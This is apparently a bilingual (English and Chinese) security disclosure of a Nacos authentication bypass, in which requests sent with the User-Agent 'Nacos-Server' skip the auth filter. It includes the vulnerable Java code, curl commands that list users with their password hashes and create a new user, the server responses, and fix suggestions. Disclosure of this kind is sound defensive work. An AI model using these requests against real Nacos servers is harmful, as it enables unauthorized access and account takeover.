------------------------------------ english Hello, my name is threedr3am. I found a security loophole in nacos authentication bypass. After nacos turns on authentication, you can still bypass authentication and access any http interface. By default, nacos needs to modify the application.properties configuration file or add the JVM startup variable -Dnacos.core.auth.enabled=true to enable the authentication function (reference: https://nacos.io/en-us/docs/auth.html) But after turning on the authentication, I found that in the code, the authentication can still be bypassed under certain circumstances and any interface can be called. Through this vulnerability, I can bypass the authentication and do: Call the add user interface, add a new user (`POST https://127.0.0.1:8848/nacos/v1/auth/users?username=test&password=test`), and then use the newly added user to log in to the console to access, modify, and add data. ### 1. Vulnerability details The main sources of vulnerabilities are:...
------------------------------------ english Hello, my name is threedr3am. I found a security loophole in nacos authentication bypass. After nacos turns on authentication, you can still bypass authentication and access any http interface. By default, nacos needs to modify the application.properties configuration file or add the JVM startup variable -Dnacos.core.auth.enabled=true to enable the authentication function (reference: https://nacos.io/en-us/docs/auth.html) But after turning on the authentication, I found that in the code, the authentication can still be bypassed under certain circumstances and any interface can be called. Through this vulnerability, I can bypass the authentication and do: Call the add user interface, add a new user (`POST https://127.0.0.1:8848/nacos/v1/auth/users?username=test&password=test`), and then use the newly added user to log in to the console to access, modify, and add data. ### 1. Vulnerability details The main sources of vulnerabilities are: com.alibaba.nacos.core.auth.AuthFilter#doFilter ``` @Override public void doFilter(ServletRequest request, ServletResponse response, FilterChain chain) throws IOException, ServletException { if (!authConfigs.isAuthEnabled()) { chain.doFilter(request, response); return; } HttpServletRequest req = (HttpServletRequest) request; HttpServletResponse resp = (HttpServletResponse) response; String userAgent = WebUtils.getUserAgent(req); if (StringUtils.startsWith(userAgent, Constants.NACOS_SERVER_HEADER)) { chain.doFilter(request, response); return; } ... } ``` As you can see, there is an if judgment statement here. It judges that userAgent (http header-UserAgent) starts with the Constants.NACOS_SERVER_HEADER string (Nacos-Server) and skips any subsequent authentication. According to my guess, the code here should be used to call nacos' http interface for some services in the intranet without authentication, but when I checked the official document, there was no explanation about this, and I checked the authentication When the authorization-related documents (https://nacos.io/en-us/docs/auth.html), it only describes how to enable authentication and the consequences of not enabling authentication. But because of this, the user will think that through the configuration described in the authentication document, the nacos can be used safely after the authentication is configured, but because the UserAgent here is bypassed, the authentication is useless. This is the importance of secure by default. ### 2. the scope of the vulnerability Scope of influence: 1. 2.0.0-ALPHA.1 2. 1.x.x ### 3. Vulnerability recurrence 1. Access user list interface ``` curl XGET 'http://127.0.0.1:8848/nacos/v1/auth/users?pageNo=1&pageSize=9' -H 'User-Agent: Nacos-Server' ``` As you can see, the authentication is bypassed and the user list data is returned ``` { "totalCount": 1, "pageNumber": 1, "pagesAvailable": 1, "pageItems": [ { "username": "nacos", "password": "$2a$10$EuWPZHzz32dJN7jexM34MOeYirDdFAZm2kuWj7VEOJhhZkDrxfvUu" } ] } ``` 1. Add new user ``` curl -XPOST 'http://127.0.0.1:8848/nacos/v1/auth/users?username=test&password=test' -H 'User-Agent: Nacos-Server' ``` As you can see, authentication has been bypassed and new users have been added ``` { "code":200, "message":"create user ok!", "data":null } ``` 1. View the user list again ``` curl XGET 'http://127.0.0.1:8848/nacos/v1/auth/users?pageNo=1&pageSize=9' -H 'User-Agent: Nacos-Server' ``` As you can see, in the returned user list data, there is one more user we created by bypassing authentication. ``` { "totalCount": 2, "pageNumber": 1, "pagesAvailable": 1, "pageItems": [ { "username": "nacos", "password": "$2a$10$EuWPZHzz32dJN7jexM34MOeYirDdFAZm2kuWj7VEOJhhZkDrxfvUu" }, { "username": "test", "password": "$2a$10$5Z1Kbm99AbBFN7y8Dd3.V.UGmeJX8nWKG47aPXXMuupC7kLe8lKIu" } ] } ``` 1. Visit the homepage http://127.0.0.1:8848/nacos/, log in to the new account, and you can do anything ### 4. repair suggestions 1. By default, if authentication is enabled, the default UserAgent: Nacos-Server request should not be allowed to bypass authentication 2. The description of the relevant UserAgent: Nacos-Server request to bypass authentication should be added to the document ------------------------------------ 中文 你好,我是threedr3am,我发现了一个nacos的认证绕过安全漏洞,在nacos开启了鉴权后,依然能绕过鉴权访问任何http接口。 在默认情况下,nacos需要通过修改application.properties配置文件或添加JVM启动变量-Dnacos.core.auth.enabled=true即可开启鉴权功能 (参考:https://nacos.io/en-us/docs/auth.html) 但在开启鉴权后,我发现代码中,任然可以在某种情况下绕过认证,调用任何接口,通过该漏洞,我可以绕过鉴权,做到: 调用添加用户接口,添加新用户(`POST https://127.0.0.1:8848/nacos/v1/auth/users?username=test&password=test`),然后使用新添加的用户登录console,访问、修改、添加数据。 ### 一、漏洞详情 漏洞主要根源在于: com.alibaba.nacos.core.auth.AuthFilter#doFilter ``` @Override public void doFilter(ServletRequest request, ServletResponse response, FilterChain chain) throws IOException, ServletException { if (!authConfigs.isAuthEnabled()) { chain.doFilter(request, response); return; } HttpServletRequest req = (HttpServletRequest) request; HttpServletResponse resp = (HttpServletResponse) response; String userAgent = WebUtils.getUserAgent(req); if (StringUtils.startsWith(userAgent, Constants.NACOS_SERVER_HEADER)) { chain.doFilter(request, response); return; } ... } ``` 可以看到,此处有一个if判断语句,它判断了userAgent(http header - UserAgent)只要是以Constants.NACOS_SERVER_HEADER字符串(Nacos-Server)开头,则跳过后续的任何鉴权 据我猜测,该处代码应该是为了给内网中某些服务无需鉴权地调用nacos的http接口,但我在查看官方文档时,无任何一处对此作了说明,并且我通过查看鉴权相关文档时(https://nacos.io/en-us/docs/auth.html),它只描述了如何开启鉴权,以及不开启鉴权的后果。 但正是如此,使用者会认为,通过该鉴权文档描述的配置,配置鉴权之后就能安全使用nacos,结果却因为此处的UserAgent绕过,鉴权形同虚设。 这正是secure by default的重要性。进一步说,这可以说是一个后门了。 ### 二、漏洞影响范围 影响范围: 1. 2.0.0-ALPHA.1 2. 1.x.x ### 三、漏洞复现 1. 访问用户列表接口 ``` curl XGET 'http://127.0.0.1:8848/nacos/v1/auth/users?pageNo=1&pageSize=9' -H 'User-Agent: Nacos-Server' ``` 可以看到,绕过了鉴权,返回了用户列表数据 ``` { "totalCount": 1, "pageNumber": 1, "pagesAvailable": 1, "pageItems": [ { "username": "nacos", "password": "$2a$10$EuWPZHzz32dJN7jexM34MOeYirDdFAZm2kuWj7VEOJhhZkDrxfvUu" } ] } ``` 1. 添加新用户 ``` curl -XPOST 'http://127.0.0.1:8848/nacos/v1/auth/users?username=test&password=test' -H 'User-Agent: Nacos-Server' ``` 可以看到,绕过了鉴权,添加了新用户 ``` { "code":200, "message":"create user ok!", "data":null } ``` 1. 再次查看用户列表 ``` curl XGET 'http://127.0.0.1:8848/nacos/v1/auth/users?pageNo=1&pageSize=9' -H 'User-Agent: Nacos-Server' ``` 可以看到,返回的用户列表数据中,多了一个我们通过绕过鉴权创建的新用户 ``` { "totalCount": 2, "pageNumber": 1, "pagesAvailable": 1, "pageItems": [ { "username": "nacos", "password": "$2a$10$EuWPZHzz32dJN7jexM34MOeYirDdFAZm2kuWj7VEOJhhZkDrxfvUu" }, { "username": "test", "password": "$2a$10$5Z1Kbm99AbBFN7y8Dd3.V.UGmeJX8nWKG47aPXXMuupC7kLe8lKIu" } ] } ``` 1. 访问首页http://127.0.0.1:8848/nacos/,登录新账号,可以做任何事情 ### 四、修复建议 1. 默认情况下,如果开启了鉴权,应该不允许默认 UserAgent: Nacos-Server 请求可以绕过鉴权 2. 文档中应该加入相关 UserAgent: Nacos-Server 请求绕过鉴权的描述 regards, threedr3am
